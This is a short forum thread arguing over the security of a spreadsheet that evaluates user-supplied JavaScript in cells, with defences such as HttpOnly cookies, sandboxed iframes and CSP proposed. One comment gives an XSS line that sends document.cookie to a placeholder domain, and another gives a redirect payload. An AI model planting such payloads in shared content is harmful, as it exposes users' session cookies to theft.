You may like, but it is an obvious security flaw. A 'real' product couldn't have this feature, at least not the way it is implemented here.

Please elaborate. ( i ask because i am writing a spreadsheet where every cell can be JSON or a JS expression )

What sort of vulnerabilities does this expose, besides letting the user shoot their feet repeatedly? Cross site scripting?

document.write('<img src="somedomain.com/?'+document.cookie);

But you'd need to send a spreadsheet with that to the victim.

Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.

have you heard of the HttpOnly attribute for cookies?

good, send HttpOnly cookies and solve that problem. window.location.href='http://www.redt*be.com'; -- if you think evaluating JS code, as-is passed by the client is a good idea go ahead.

I most definitely will. and if my users want to browse your favorite porn site i don't see why i shouldn't let them..

Put it in a sandboxed iframe, serve it from a separate domain, and use a very restrictive CSP?

Yeah! Better replace it with VB and you've got no security probl... oh wait!